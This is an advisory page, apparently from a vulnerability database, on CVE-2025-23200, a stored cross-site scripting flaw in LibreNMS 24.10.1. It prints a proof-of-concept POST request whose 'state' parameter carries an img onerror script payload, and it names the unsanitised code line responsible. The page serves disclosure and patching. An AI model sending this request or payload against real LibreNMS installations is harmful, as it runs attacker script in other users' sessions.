CVE-2025-23200: LibreNMS Misc Section Stored Cross-site Scripting vulnerability

January 16, 2025 (updated January 17, 2025)

StoredXSS-LibreNMS-MiscSection

Description:

Stored XSS on the parameter: ajax_form.php -> param: state

Request:

POST /ajax_form.php HTTP/1.1
Host: <your_host>
X-Requested-With: XMLHttpRequest
X-CSRF-TOKEN: <your_XSRF_token>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: <your_cookie>

type=override-config&device_id=1&attrib=override_icmp_disable&state="><img%20src%20onerror="alert(1)">

of Librenms version 24.10.1 (https://github.com/librenms/librenms) allows remote attackers to inject malicious scripts. When a user views or interacts with the page displaying the data, the malicious script executes immediately, leading to potential unauthorized actions or data exposure.

The vulnerability in the line:

$attrib_val = get_dev_attrib($device, $name);

within the dynamic_override_config function arises because the value of $attrib_val is retrieved from untrusted data without any sanitization or encoding (at Line 778).

References

Detect and mitigate CVE-2025-23200 with GitLab Dependency Scanning

Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →